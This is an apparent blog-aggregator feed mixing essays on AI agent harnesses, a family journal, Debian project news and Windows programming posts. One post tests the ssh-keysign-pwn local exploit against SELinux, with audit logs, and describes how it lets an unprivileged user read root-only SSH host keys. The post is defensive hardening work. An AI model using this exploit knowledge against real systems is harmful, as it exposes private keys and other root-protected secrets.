Harnesses don’t shrink; they move

One of the better observations in the Anthropic write-up is that as models improve, the space of interesting harness combinations doesn’t shrink. It moves.

The naive story is that better models make harnesses obsolete. If the model can plan, no planner. If the model is coherent at long horizons, no context resets. And yes, Opus 4.6 largely killed the context-anxiety failure mode (Sonnet 4.5 used to wrap up work prematurely as it approached what it thought was its context limit), which means a whole class of anxiety-mitigation scaffolding I was writing six months ago is now dead code.

But the ceiling moved with the model. Tasks that were unreachable are in play, and they have their own failure modes. The anxiety scaffolding goes away, and in its place you need a multiday memory policy or a harness that coordinates three specialized agents or evaluators for design quality in generated UIs. The assumptions shift, and so does the scaffolding that encodes them.

Anthropic puts it cleanly: “Every component in a harness encodes an assumption about what the model can’t do on its own.” When the model gets better at something, that component becomes load-bearing for nothing and should come out. When the model unlocks something new, new scaffolding is needed to reach the new ceiling.

The model-harness training loop

The other thing that’s happening, which Viv names explicitly, is a feedback loop between harness design and model training.

The harness doesn't shrink, it moves

Today’s agent products are posttrained with harnesses in the loop. The model gets specifically better at the actions the harness designers think it should be good at: filesystem operations, bash, planning, subagent dispatch. That’s why Opus 4.6 feels different inside Claude Code than inside someone else’s harness, and it’s why changing a tool’s logic sometimes causes strange regressions. A genuinely general model wouldn’t care whether you used apply_patch or str_replace, but cotraining creates overfitting.

The practical implication is twofold. A harness is a living system, not a config file you set up once. And the “best” harness isn’t necessarily the one the model was trained inside; it’s the one designed for your task. Viv’s Top 30 to Top 5 Terminal Bench jump is the clearest proof point I’ve seen.

Harness as a service

Viv’s other contribution is the HaaS framing: harness as a service. The observation is that we’re moving from building on LLM APIs (which give you a completion) to building on harness APIs (which give you a runtime). The Claude Agent SDK, the Codex SDK, and the OpenAI Agents SDK all point in the same direction. You get the loop, the tools, the context management, the hooks, and the sandbox primitives out of the box, and you customize them.

The shift matters because the default path used to be: build your own loop, wire up your own tool-calling, handle your own conversation state, invent your own approval flow. Now the default path is: pick a harness framework, configure it along the four pillars (system prompt, tools, context, subagents), and put the rest of your effort into domain-specific prompt and tool design.

That’s what makes “skill issue” tractable. You’re not rebuilding an agent from scratch every time something goes wrong. You’re tuning a configuration surface that’s already well-factored.

Viv’s line on this is also the best argument for starting messy: “Good agent building is an exercise in iteration. You can’t do iterations if you don’t have a v0.1.”

Where this is going

Look at the top coding agents side by side (Claude Code, Cursor, Codex, Aider, Cline) and they look more like each other than their underlying models do. The models are different. The harness patterns are converging. I don’t think that’s an accident. It’s the industry slowly finding the load-bearing pieces of scaffolding that turn a generative model into something that can ship.

Viv’s framing of the open problems is the one I find most exciting: orchestrating many agents working in parallel on a shared codebase; agents that analyze their own traces to identify and fix harness-level failure modes; harnesses that dynamically assemble the right tools and context just-in-time for a given task instead of being preconfigured at startup.

That last one, in particular, feels like where harnesses stop being static config and start becoming something closer to a compiler.

12:56

This and that - and bread [Judith Proctor's Journal]

 Friday is Theo day. We have our toddler grandson every Friday and hand him back Saturday morning.

This is a good arrangement for all parties.  He's at the age where he loves having books read to him and is starting to point to dogs and cats and say 'doh' and 'ca'.

He likes going for walks- we took him over the heath today, partly in a pushchair and partly toddling along on his own feet.  He loves picking up sticks and playing with them, the occasional fir cone also provides entertainment.  He's pleasingly interested when I show him buttercups and ferns, etc. and tell him their names.  Today, we went over the board walk on our local mini-bog- stamping on the boards makes an interesting sound that he loves to test out.  Fluffy caterpillars of fallen willow seed heads were duly played with and interesting grass stems.

We got back at just the right time to take his morning sleep (often quite a long one).

Granny and grandad are settling down to catch up on computer stuff while he's asleep.

So, I'm posting here, then catch up on a couple of morris-related emails, and then grab a snack. One of the annoying side effects of the kind of diabetes I have is that I've lost too much weight due to poor absorption of carbs.  So small meals between meals become necessary.

The catch is that it can be hard to find things I want to eat.  A simple sandwich is easiest, but modern bread tastes of nothing at all and has no texture.  I don't look forward to eating it...

I've just persuaded my nearest and dearest that we should try Riverford's wholemeal loaf (when did you last see a 'wholemeal' loaf as opposed to a 'brown' loaf - which is every bit as bad as white bread).

They're not cheap compared to a supermarket loaf, but how does it taste?

Very good!  I just tied a bit with nothing on it at all.  Tasty and far more texture than supermarket bread. But as you chew it, more and more flavour comes through.  Yum.  Not only that, but being Riverford, it's also organic and made by a family bakery.

Even at £4 per loaf, it's something I'm definitely buying again.  I can look forward to eating this - on it's own, with a little butter/vegan spread, or whatever I fancy. 

This is what I want from bread.   A texture that means it bounces back when you press it, that runny toppings like tahini will soak in rather then run off, and actual flavour!

 

 

 

 

 

 



comment count unavailable comments

12:14

This and that [Judith Proctor's Journal]

 Friday is Theo day. We have our toddler grandson every Friday and hand him back Saturday morning.

This is a good arrangement for all parties.  He's at the age where he loves having books read to him and is starting to point to dogs and cats and say 'doh' and 'ca'.

He likes going for walks- we took him over the heath today, partly in a pushchair and partly toddling along on his own feet.  He loves picking up sticks and playing with them, the occasional fir cone also provides entertainment.  He's pleasingly interested when I show him buttercups and ferns, etc. and tell him their names.  Today, we went over the board walk on our local mini-bog- stamping on the boards makes an interesting sound that he loves to test out.  Fluffy caterpillars of fallen willow seed heads were duly played with and interesting grass stems.

We got back at just the right time to take his morning sleep (often quite a long one).

Granny and grandad are settling down to catch up on computer stuff while he's asleep.

So, I'm posting here, then catch up on a couple of morris-related emails, and then grab a snack. One of the annoying side effects of the kind of diabetes I have is that I've lost too much weight due to poor absorption of carbs.  So small meals between meals become necessary.

The catch is that it can be hard to find things I want to eat.  

 

 

 

 

 



comment count unavailable comments

Bypassing On-Camera Age-Verification Checks [Schneier on Security]

Some AI-based video age-verification checks can be fooled with a fake mustache.

10:35

Personally [Seth's Blog]

Professionals take their work seriously.

Hobbyists can take it personally.

We arrive and make a promise. We do it on behalf of the client, and that promise has little to do with what we might want to do–it’s what they need us to do.

And so we make our promises carefully, and keep them with effort. That’s serious.

But it’s not personal.

10:07

Russell Coker: Debian SE Linux and ssh-keysign-pwn [Planet Debian]

I just tested out the ssh-keysign-pwn exploit [1] on Debian kernel 6.12.74+deb13+1-amd64 which was released before these exploits.

When sshkeysign_pwn is run as user_t the following is logged in the audit log and it fails to exploit anything:

type=SYSCALL msg=audit(1778831599.951:22353257): arch=c000003e syscall=438 success=no exit=-1 a0=3 a1=c a2=0 a3=1b8020 items=0 ppid=5632 pid=6654 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts0 ses=144 comm="sshkeysign_pwn" exe="/home/test/a/ssh-keysign-pwn/sshkeysign_pwn" subj=user_u:user_r:user_t:s0 key=(null)ARCH=x86_64 SYSCALL=pidfd_getfd AUID="test" UID="test" GID="test" EUID="test" SUID="test" FSUID="test" EGID="test" SGID="test" FSGID="test"
type=PROCTITLE msg=audit(1778831599.951:22353257): proctitle="./sshkeysign_pwn"
type=AVC msg=audit(1778831599.951:22353258): avc:  denied  { ptrace } for  pid=6654 comm="sshkeysign_pwn" scontext=user_u:user_r:user_t:s0 tcontext=user_u:user_r:user_t:s0 tclass=process permissive=0

When it is run as unconfined_t the contents of the /etc/ssh/ssh_host_ecdsa_key file are correctly displayed on standard out in about 10ms, the file in question is only readable by root and a non-root user can use this exploit to read it.

It wouldn’t be uncommon to have a system configured to allow users to trace their own processes. The following policy addition grants access for the user to trace their own processes:

allow user_t self:process ptrace;

With that in place the sshkeysign_pwn exploit still doesn’t work and there are logs like the following:

type=AVC msg=audit(1778833455.726:57355191): avc:  denied  { read } for  pid=6941 comm="ssh-keysign" name="ssh_host_rsa_key" dev="vda" ino=15492 scontext=user_u:user_r:user_t:s0 tcontext=system_u:object_r:sshd_key_t:s0 tclass=file permissive=0
type=SYSCALL msg=audit(1778833455.726:57355191): arch=c000003e syscall=257 success=no exit=-13 a0=ffffffffffffff9c a1=55eadec43061 a2=0 a3=0 items=0 ppid=6933 pid=6941 auid=1000 uid=1000 gid=1000 euid=0 suid=0 fsuid=0 egid=1000 sgid=1000 fsgid=1000 tty=pts0 ses=144 comm="ssh-keysign" exe="/usr/lib/openssh/ssh-keysign" subj=user_u:user_r:user_t:s0 key=(null)ARCH=x86_64 SYSCALL=openat AUID="test" UID="test" GID="test" EUID="root" SUID="root" FSUID="root" EGID="test" SGID="test" FSGID="test"

So if you could find some secret data in a file that’s only restricted by Unix permissions and user_t is granted ptrace access then a variant of that exploit could work.

When user_t is allowed ptrace access the chage_pwn exploit fails with the following log entries, so any binary that runs in a different domain can’t be used in that situation.

type=AVC msg=audit(1778833908.020:57434896): avc:  denied  { ptrace } for  pid=7037 comm="chage_pwn" scontext=user_u:user_r:user_t:s0 tcontext=user_u:user_r:passwd_t:s0 tclass=process permissive=0
type=SYSCALL msg=audit(1778833908.020:57434896): arch=c000003e syscall=438 success=no exit=-1 a0=3 a1=5 a2=0 a3=1b7e00000000 items=0 ppid=5632 pid=7037 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts0 ses=144 comm="chage_pwn" exe="/home/test/a/ssh-keysign-pwn/chage_pwn" subj=user_u:user_r:user_t:s0 key=(null)ARCH=x86_64 SYSCALL=pidfd_getfd AUID="test" UID="test" GID="test" EUID="test" SUID="test" FSUID="test" EGID="test" SGID="test" FSGID="test"

Conclusion

In a “strict” configuration with users having the user_t domain a Debian system is not vulnerable to these exploits unless there is some configuration error or some unusual configuration choices. Users with the unconfined_t domain can successfully run the exploits.

08:28

Adjacency [Penny Arcade]

New Comic: Adjacency

07:49

Freexian Collaborators: Debian Contributions: Detecting undeclared file conflicts, contributors.debian.org mini-sprint, security-tracker performance and more! (by Anupa Ann Joseph) [Planet Debian]

Debian Contributions: 2026-04

Contributing to Debian is part of Freexian’s mission. This article covers the latest achievements of Freexian and their collaborators. All of this is made possible by organizations subscribing to our Long Term Support contracts and consulting services.

Undeclared file conflicts, by Helmut Grohne

The duplication checker, the Multi-Arch hinter, and the /usr-move analyzer share significant parts of their code. While the /usr-move transition is complete, the other tools needed a bit of love. Helmut added Python type annotations, slightly improved the performance of the duplication website and shared more code between these tools.

Building upon this Helmut looked into file conflicts of various kinds such as unrelated packages installing overlapping files, file type conflicts, mismatching directory metadata and shared files of Multi-Arch: same packages with varying content. Implementing reliable detection proved to be difficult due to the amount of corner cases. So Helmut semi-manually filed bugs. In that process, it became apparent that binNMUs do not reproduce SOURCE_DATE_EPOCH across architectures and therefore some shared files embedding the build date would vary in content. Additionally, a significant number of reports required further correspondence.

contributors.debian.org mini-sprint, by Enrico Zini

Enrico Zini met with Mattia Rizzolo to continue the work started at DebConf 25 on crediting contributions done via salsa, and to catch up with accumulated site issues.

Building on the same kind of infrastructure used to notify tag2upload, salsa.debian.org triggers a webping on pushes and merge request activity, which causes a small JSON payload to be queued in a private directory on contributors.debian.org.

We worked on processing, filtering and aggregating the files in the queue into a private, staging database table. When configuring a data source on the site, it is now possible to configure automated submission of contributions from information in the staging table. This makes it significantly simpler to credit contributors for all teams that use Salsa as their code repository and coordination tool, as the site can take care of the data mining for you.

See more details in the sprint report posted to debian-devel-announce.

MiniDebConf Campinas, by Lucas Kanashiro, Santiago Ruano Rincón and Antonio Terceiro

MiniDebConf Campinas was held between April 23rd and 25th, at the State University of Campinas, and was preceded by a MiniDebcamp between April 20th and 22nd. Freexian was Gold sponsor for the event, and Freexian collaborators were active contributors to the conference success.

Lucas and Santiago delivered a talk about Debian LTS during MiniDebConf Campinas 2026, where they described how the LTS project benefits Debian users and developers, while strengthening Debian itself.

Lucas and Antonio delivered a talk about internship programs in Debian during MiniDebConf Campinas 2026, with the goal of getting students interested in working in and with Debian.

Lucas took part in the MiniDebConf Campinas content team, reviewing/accepting talks and building the schedule.

Antonio led a session where he invited the audience to weigh in on current controversies in Debian. The session presented playful elements as colored signs to denote agree/disagree, and was not recorded, to help people feel more comfortable about speaking up. He might be convinced to lead a similar session at the next DebConf.

Antonio also organized a debate to discuss the consequences of new Brazilian regulation for the protection of children and adolescents in digital spaces for Debian and other free operating systems, but also for the free software community in general. This session was very fruitful and will lead into further actions, as one of the main outcomes was the realization that the free software community must follow the discussion leading up to similar regulations more closely to avoid being caught by surprise when they come into effect.

security-tracker performance, by Helmut Grohne and Emilio Pozuelo Monfort

Prompted by spontaneous influx of web requests on Freexian’s security-tracker back in February, we considered the options for managing that demand. One of our mitigations was making it faster. To that end, Helmut sent two MRs towards improving the situation. There are four notable improvements. The use of Python’s str.translate generally speeds up rendering of larger templates. Indexing the CVE names avoids a costly sequential table scan. Avoiding FFI calls while sorting and reducing the queryset speeds up the source package view. Emilio reviewed and deployed the changes on to the Debian instance. Together these changes provide a twofold speedup on both Freexian’s and Debian’s instance on average.

dput-ng data loss bug, by Colin Watson

Ian Jackson (not affiliated with Freexian) reported that dput-ng could lose data when using the local install method, which could cause misleading results in tests of other packages; they also filed an initial merge request to fix it. Colin improved this to isolate its tests properly, and uploaded it.

Miscellaneous contributions

  • Lucas coordinated the src:valkey update to version 9 in unstable with a potential co-maintainer.
  • Lucas provided a security update for src:valkey targeting “trixie”.
  • Thorsten did two uploads of foo2zjs, one to fix a bug and one to improve packaging. As there have been several CVEs published for cups he also did an upload of a new upstream version. Unfortunately this introduces a regression and another upload was needed to take care of a crash. The patch for one CVE also broke a test script, which is used by lots of printing packages in Debian. As a result some autopkgtest runs failed. This could be fixed as well and the only remaining issue that needs some more investigation is related to cups-pdf. It is also worth mentioning that some issues related to the apparmor configuration of cups could be resolved.
  • Helmut sent patches for 11 cross build failures.
  • Helmut sent a MR for enabling the new mainline YT6801 ethernet Linux driver and it is now working fine with Debian’s 7.x kernels.
  • Helmut upgraded a crossqa.debian.net autobuilder to “trixie”.
  • Carles using po-debconf-manager, improved Catalan translations: reviewed 2 packages, submitted 3 packages, deleted 5 packages.
  • Carles did further code developments for check-relations: steps towards making it production ready when the initial round of reports are analyzed. New “show-package” (information) command, improvements for “report_missing” cases, added support for ignoring packages for specific reasons, added unit tests, added CI. Used it to open 39 new bugs. Also followed up different open bugs
  • Raphaël completed the French translation of Zulip for the release of version 12.0. Zulip is a nice 100% free software threaded communication platform for distributed teams.
  • Stefano did routine uploads of python-pipx, python-mitogen, platformdirs, python-authlib, python-discovery, distro-info-data, python-virtualenv, python-certifi, python-wheel, pypy3.
  • Stefano uploaded distro-info-data updates to stable and oldstable proposed updates, with the latest Ubuntu release.
  • Stefano took part in DebConf 26 preparation meetings.
  • Stefano prepared DebConf’s online video streaming infrastructure for MiniDebConf Campinas, and configured the Debian reimbursement system to handle their travel bursary claims.
  • Stefano helped MiniDebConf Hamburg prepare their website for 2027.
  • Stefano did some sysadmin work on debian.social infrastructure.
  • Stefano reviewed Matthias’ python3.15 packaging and rebased his work on top of it.
  • Antonio implemented several improvements to the Debian CI platform, including but not limited to adding support for dark mode, dropping compatibility with ActiveRecord < 7 which is no longer shipped in Debian stable, and generating content-based links to static assets, in two parts.
  • Antonio debugged a general slowness in salsa, caused by loss of IPv6 connectivity between the salsa host and the remote object storage in “the cloud”, which is a problem due to an open upstream bug in gitlab.
  • Santiago reviewed different changes to the Salsa CI pipeline, including the new uscan test job, prepared by Thaís Rebouças Araujo, and the final review to introduce faketime testing, made by Áquila Macedo.
  • Santiago continued helping the DebConf 26 local team to prepare the conference.
  • Emilio updated libxpm to address a security issue.
  • Colin finished upgrading groff to 1.24.1; 1.24.0 and 1.24.1 were the first upstream releases since 2023 and had extensive changes, so this took some time to get right.
  • Colin released “bookworm” and “trixie” fixes for CVE-2026-3497 in openssh, and issued the corresponding BSA-130 for trixie-backports.
  • Colin upgraded openssh to 10.3p1.
  • Anupa worked on the accounting tasks for MiniDebConf Kanpur and prepared and submitted a report to the fiscal host.

05:49

Girl Genius for Friday, May 15, 2026 [Girl Genius]

The Girl Genius comic for Friday, May 15, 2026 has been posted.

04:49

FFS code review and Emacs extensibility with Protesilaos [Planet GNU]

In the recent weeks I've been engaging Prot as an Emacs coach to help with doing review passes over my upcoming ffs package as I work on polishing and documenting it in preparation for offering it for inclusion in GNU ELPA.

UPDATE 2026-05-15 08:50:10 -0400: Prot also published an article about our session on his website: https://protesilaos.com/codelog/2026-05-15-emacs-amin-bandali-ffs-display-buffer-org-capture/

Today we had our third session where we started by reviewing and talking about my recent changes to ffs, then ventured to other Emacs-related topics with the overarching theme of the flexibility and extensibility of GNU Emacs, including display-buffer-alist, keyboard macros, defining a custom ox-bhtml Org export backend derived from Org's ox-html for ultimate flexibility when exporting my site's pages from Org to HTML, Org capture, plain text files and Emacs's diary and how it compares to org-agenda, and keeping a journal with the help of Emacs.

Here is the video recording of our session, which I share with Prot's permission:

Sorry, this embedded video will not work, because your web browser does not support HTML5 video.
[ please watch the video in your favourite streaming media player ]​

You can view or download the full-resolution video from the Internet Archive.

Lastly, here is the snippet Prot shared for having Isearch treat space as a wildcard, helpful for more easily matching multiple parts of a line:

(setq search-whitespace-regexp ".*?")
(setq isearch-lax-whitespace t)
(setq isearch-regexp-lax-whitespace nil)

Take care, and so long for now.

02:21

Daniel Baumann: Debian: Linux Vulnerability Mitigation (ssh-keysign-pwn) [Planet Debian]

After the Linux local root privilege escalations of the last two weeks, the bug of today is ssh-keysign-pwn [CVE-2026-46333] which allows to read root-owned files as an unprivileged user.

Exploiting the vulnerability doesn’t require to load any specific modules like the bugs from the last weeks, this one needs to be fixed by rebooting the system into an updated kernel.

I’ve cherry-picked the upstream commit to fix it in trixie-fastforward-backports (linux 7 backports for trixie), confirmed that the exploits don’t work anymore, and submitted a merge request for sid.

Updates:

01:35

00:49

Page 14 [Flipside]

Page 14 is done.

Thursday, 14 May

23:14

The Big Idea: Thomas Elrod [Whatever]

It can be hard to have solid opinions and identities when we live in a world of mixed messages and misinformation. With propaganda running rampant, how can we be sure if reality is really real? Author Thomas Elrod plays with this idea of a false reality in his newest novel, The Franchise. Tune in to his Big Idea to see how one man’s fiction may be another man’s reality.

THOMAS ELROD:

I think we are all a little fatigued by the long-running IP franchises on TV and in movies. Sure, we all had a good time watching Harrison Ford return as Han Solo or were happy to see Captain America wield Thor’s hammer, but lately? Eh? It all feels tired, as long-running franchises often do. Good thing Hollywood has plenty of other films and shows in development and we can look forward to some fresh stories in the coming years…

Okay, so there’s the rub. It certainly feels like not only will our big cultural mega-franchises not be retired, it is as if they can’t be. Too much of the shareholder value of Disney or Warner Brothers or Netflix is wrapped up in these very expensive properties for these very large corporations (always merging together into even larger corporations) to ever stop. They can’t. They have to continue generating revenue and growth.

What happens to culture if it can never stop recycling itself?

My big idea was this. I wanted to imagine a film franchise that just kept on going forever, kept expanding and looking for new ways to juice the IP. I was partially inspired by the failed Star Wars hotel, which tried to create an immersive storytelling experience for guests in Disney World, but which was too expensive and wonky. However, it’s not hard to see how Disney was using that experience to commodify LARPing and cosplay and other fan activities into something they could monetize and turn into content.

So I did the thing Science Fiction writers do and I extrapolated, imagining a Truman Show-esque environment where a film studio sets up a living set of a popular fantasy film franchise and populates it with people who have had their memories changed to believe they are real characters in this world. Plots are put into motion, writers and actors are hired to push the story along, and everything is secretly filmed. It’s pitched to fans as a limited-time experience, where you can sign up to have your memory temporarily altered so you can live in this world you love so much. Surely, nothing will go wrong!

The challenge as a writer is how to sustain this concept for the course of an entire novel and also how to build a real story out of it. This is always the problem with high-concept ideas. It’s one thing to come up with a hook, it’s another to create interesting characters and engage them in the twists and turns of an effective story that doesn’t become repetitive.

For me, the thing I held onto was the larger “What if” that this concept suggests, which isn’t just about intellectual property in Hollywood but about one’s identity in a world of misinformation. We all live in a kind of constructed reality, whether we know it or not, based on our sources of news, social media, entertainment, etc. We all know people who seem to live and exist in a totally different conception of the world than our own, and this is both baffling and frustrating. But we still have agency over our own lives, and if we want to spend our energy on, say, denying the efficacy of vaccines or insisting a fair election was rigged, to what extent does a person need to take responsibility for those opinions and to what extent is it possible (or ethical) to blame their misinformation reality on their beliefs?

This is a thornier question but also one which provided a way into the story, which very early on I knew was going to include many different character POVs, some from people who play a minor role in the actual plot but whose perspective ends up being different or interesting. Since some people in the story know what is really going on, some have partial information or suspect something, and some have their own views on what is happening despite possibly knowing what is “real,” the great gift of interior and perspective that fiction affords was my way to start building characters and story. My book would be about this confluence of perspectives, and what happens when they clash into one another.

Along the way there was lots of opportunity for light satire about Hollywood, deconstruction of modern fantasy storytelling, and a lot else, but being able to marry theme and structure was the key to making sure my Big Idea, my book’s hook, actually worked and remained interesting over 350 pages. It ended up being a blast to write, so I hope that comes across to everyone else and that they have just as good a time reading it.


The Franchise: Amazon|Barnes & Noble|Bookshop|Powell’s

Author Social: Website|Instagram|Bluesky|Threads

Read an excerpt on Reactor.

23:07

Link [Scripting News]

I have Claude Code hooked up to Chrome. It's crawling around inside the DOM of the running system, like humans do in a debugger. It's a bit like Fantastic Voyage if you've ever seen it. I've been waiting for this moment. Now we can do some really nice UI work.

22:28

The data is abundantly clear: the EU Digital Markets Act is working [OSnews]

The EU’s Digital Markets Act has been in effect for a mere two years, but despite all the obstructionism, malicious compliance, and steady stream of lies from US tech companies and Apple in particular, it seems this rather basic consumer protection legislation is already bearing fruit.

In a two-year review report on the DMA, the European Commission notes that alternative browser usage has soared, data portability solutions are spreading, alternative application stores are growing, and much more. On top of that, end users can now opt out of companies combining various data sources for profiling, and a “significant share” of EU users have apparently done so. Furthermore, end users in the EU can now remove preinstalled applications (whereas American users cannot) and they can download their data from big technology companies and authorise other companies to use that data.

Mozilla published a blog post detailing how it has profited from the Digital Markets Act, and it ain’t no peanuts: every ten seconds, someone on iOS chooses Firefox on iOS’ browser choice screen, which amounts to more than six million Firefox users on iOS. They also tend to stick with Firefox on iOS, as retention is five times higher when this browser is chosen through a browser choice screen.

Academic analysis points the same way. Independent researchers compared Firefox daily active users in the EU with 43 non-EU countries. Comparing the 15 months before and after browser choice screens rolled out on iOS, they found that Firefox daily active users (DAU) were 113% higher in the EU than it would have been without the DMA. On Android, it was 12% higher. The smaller Android effect is due to the fact that Firefox usage there started from a much higher base, and the Android rollout has been more uneven than on iOS. The research also shows that the DMA’s effect is growing over time.

↫ Gemma Petrie and Tasos Stampelos on the Mozilla blog

Both the underlying data in the EC report and the data Mozilla provides indicates that the Digital Markets Act is having real and tangible effects, for end users, developers, and companies alike. The neverending barrage of anti-EU and anti-DMA propaganda from Apple, the US government, and their PR attack dogs seems to have been weirdly justified, from the American perspective: basic consumer protection legislation does, indeed, work to lessen the stranglehold major technology companies have on our lives.

And considering just NVIDIA’s market cap alone is now equal to more than 17% of the United States’ GDP, it makes sense the Americans are unhappy with the DMA. That’s going to make one hell of a sound when it pops.

20:35

[$] Policy groups for memory management [LWN.net]

The kernel's control-group subsystem works well for resource management, Chris Li said at the beginning of his memory-management-track session at the 2026 Linux Storage, Filesystem, Memory Management, and BPF Summit. Control groups work less well for other use cases, though. He was there to present his proposed enhancement, called "policy groups", that would address some of the shortcomings that he has encountered. A consensus on how this feature should look still seems distant, though.

20:07

A constant-space linear-time algorithm for deleting all but the 10 most recent files in a directory [The Old New Thing]

Say you have a directory full of files, and you want to delete all but the 10 most recent files. Is there a way to tell Find­First­File to enumerate the files in date order?

No, there is no way to tell Find­First­File to enumerate the files in date order. The files enumerated by Find­First­File are produced in whatever order the file system driver wants. For example, FAT typically enumerates them in the order the files appear in the directory listing, which could be in order of creation if the files were added sequentially, or some mishmash order if there were renames or deletions mixed in.

Since you can’t control the order in which the files are enumerated, you’ll have to do the sorting yourself. The naïve solution is to read in all the entries, sort them by last-modified date, and then delete all but the last ten. This is O(n) space and O(n log n) running time.

But you can do better.

This job calls for a priority queue. A priority queue is a data structure that supports these operations, where n is the number of items in the priority queue.

  • Add sorted: O(log n)
  • Find largest: O(1)
  • Remove largest: O(log n)

The above description is for a max-priority queue. There is also a min-priority queue where the final two operations are “find smallest” and “remove smallest”. The two versions are equivalent because you can just use a reverse-sense comparison to switch from one to the other.

What we can do is enumerate all the files and add them one by one to a min-priority queue sorted by modified date. The priority queue holds the newest items. If the priority queue size exceeds 10, then we delete the file corresponding to the “smallest” (earliest) entry in the priority queue, and the remove that entry from the priority queue.

Since the priority queue size has a fixed cap, all of the operations run in O(1) time because the value of n is bounded by a predetermined constant. (Of course, the larger the cap, the larger the constant in O(1).) The overall algorithm then runs in O(n) times, where n is the number of files in the directory.

Here’s a sketch of a solution. To get a min-priority heap, we have to reverse the sense of the comparison in dateAscending.

constexpr int files_to_keep = 10;

auto dateAscending = [](const WIN32_FIND_DATA& a, const WIN32_FIND_DATA& b) {
    return CompareFileTime(&a.ftLastWriteTime, &b.ftLastWriteTime) > 0;
    };

std::priority_queue<WIN32_FIND_DATA,
        std::vector<WIN32_FIND_DATA>, decltype(dateAscending)>
        names(dateAscending);

WIN32_FIND_DATA wfd;
wil::unique_hfind findHandle( FindFirstFileW(L"*.*", &wfd));
if (findHandle.is_valid())
{
    do
    {
        if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {
            // Skip directories
            continue;
        }

        names.push(wfd);
        if (names.size() > files_to_keep) {
            DeleteFileW(names.top().cFileName);
            names.pop();
        }
    } while (FindNextFileW(findHandle.get(), &wfd));
}

It’s unfortunate that std::priority_queue doesn’t have a deduction guide that deduces the Comparator. We have to specify it explicitly, and since it comes after the Container, we have to write out the container type manually instead of allowing it to be deduced.

It’s also unfortunate that it’s hard to call reserve() on the vector hiding inside the priority_queue. This means that the names.push() could throw an exception. At least we use an RAII type (wil::unique_hfind) to ensure that the find handle is not leaked.

If you have access to std::inplace_vector, you could use a

std::priority_queue<WIN32_FIND_DATA,
        std::inplace_vector<WIN32_FIND_DATA, files_to_keep + 1>,
        decltype(dateAscending)> names(dateAscending);

to avoid memory allocations entirely. (It also makes it clearer that the algorithm is constant-space.)

This is an example of a so-called online algorithm, an algorithm that does its work incrementally rather than requiring all of the input before it can start working.

Exercise: What if the task was to delete the 10 oldest files?

The post A constant-space linear-time algorithm for deleting all but the 10 most recent files in a directory appeared first on The Old New Thing.

Why do Windows client editions on 32-bit x86 systems artificially limit RAM to 4 GB? [The Old New Thing]

Windows XP SP 2 introduced Data Execution Prevention (DEP), which takes advantage of a then-new feature of x86-class processors that allowed you to deny execution from data pages. The new feature was Physical Address Extensions (PAE) which also allowed those 32-bit processors to access physical RAM above the 4 GB boundary. Although you could turn on Data Execution Prevention on all systems, only server products would use the memory above 4 GB.

A reader asked, “What was the real reason client editions were prevented from using more than 4 GB of RAM?”

The use of the word “real” in the question implies that the reader believed that the official reason was a lie, and there was some nefarious evil reason for the limitation. It’s unclear what this nefarious reason would be. Maybe the reader thought the “real” reason was “To force users to buy copies of Windows Server, which is far more lucrative”, though that doesn’t make sense. The cheapest version of Windows Server 2003 32-bit edition that supported more than 4 GB of RAM was Enterprise Edition, which sold for $3,999.¹ This is an outrageous price for a consumer operating system.

The reason why consumer products don’t use RAM above 4 GB is explained in the documentation that accompanied the introduction of the feature under “Driver issues”.

Typically, device drivers must be modified in a number of small ways. Although the actual code changes may be small, they can be difficult. This is because when not using PAE memory addressing, it is possible for a device driver to assume that physical addresses and 32-bit virtual address limits are identical. PAE memory makes this assumption untrue.

[M]any device drivers designed for these systems may not have been tested on system configurations with PAE enabled. In order to limit the impact to device driver compatibility, changes to the hardware abstraction layer (HAL) were made to Windows XP SP2 and Windows Server 2003 SP1 Standard Edition to limit physical address space to 4 GB.

As explained above, memory above 4 GB was not enabled for compatibility reasons. Many drivers inadvertently assume that all physical address fit in 32 bits. (DMA drivers for example.) Those drivers would corrupt memory if memory above 4 GB were made available.

Memory above 4 GB is enabled on server because if you are a server administrator, you don’t install random drivers for that hand-held scanner you bought at Best Buy from the bargain bin for $10. Server administrators typically run only the plain vanilla drivers that come with Windows. (They don’t even install manufacturer video drivers.) All the drivers that come with Windows have been tested for addresses above 4 GB. That 2001 driver for the $10 handheld scanner has not, and there’s a good chance that it will truncate addresses above 4 GB and corrupt memory as a result.

The consumer market and the server market are very different in terms of usage pattern. Consumers will install practically anything. Server administrators install as little as possible. Consumers have no technical expertise. Server administrators have access to highly-skilled staff.

Of course, this is all now a historical oddity. Systems with only 4 GB of RAM are vanishingly rare, and Windows began discouraging the production of systems using 32-bit processors in 2020, finally ending the production of 32-bit editions entirely with Windows 11.

¹ The only other version that supported more than 4 GB of RAM was Datacenter Edition, and on the pricing sheet I found, they didn’t even bother listing the price. If you have to ask, you can’t afford it.

The post Why do Windows client editions on 32-bit x86 systems artificially limit RAM to 4 GB? appeared first on The Old New Thing.

19:21

Classic 7 combines Windows 7’s Aero Glass with Windows 10 [OSnews]

Interest in classic user interface design is spiking, and today we’ve got another great example, highlighted yesterday by Micheal MJD. Classic 7 combined Windows 10 LTSC with a whole slew of themes and deep modifications to deliver Windows 10, but made to look, feel, and even act like Windows 7.

Classic 7 is a Windows 10 (IoT Enterprise LTSC 2021) modification made to look 1:1 to Windows 7. It has all of the goodies that Windows 7 had along with some extras included! Classic 7 features a 1:1 OOBE recreation, meaning it’ll feel just like your PC simplified once more.

↫ Classic 7 website

As Micheal MJD’s video shows, this is much more than a mere theme, and extends far deeper into the operating system than these kinds of projects generally do. I have no idea how stable this really is, or if it’s even remotely legal to do something like this, but who the hell cares – this is incredibly fun, and seems quite well done.

18:28

Generative AI in the Real World: Chang She on Data Infrastructure for AI [Radar]

As a pandas core contributor and early Parquet adopter who built AI data pipelines at streaming company Tubi TV, Chang She saw firsthand why the traditional data stack breaks down for AI workloads—and founded LanceDB to fix it. Chang joined Ben Lorica to explain why vector databases are too narrow a solution for modern AI data needs, and what a true multimodal data infrastructure actually looks like. Chang and Ben get into why the Lance file format is quickly becoming the open source standard for multimodal data, how the rise of agents is exploding data infrastructure demands, why open-weight models are the enterprise cost shift to watch in the next 12 months, and more. “Trillion is the new billion,” Chang says, and the enterprises that set up their data infrastructure now for that scale will be the ones that succeed.

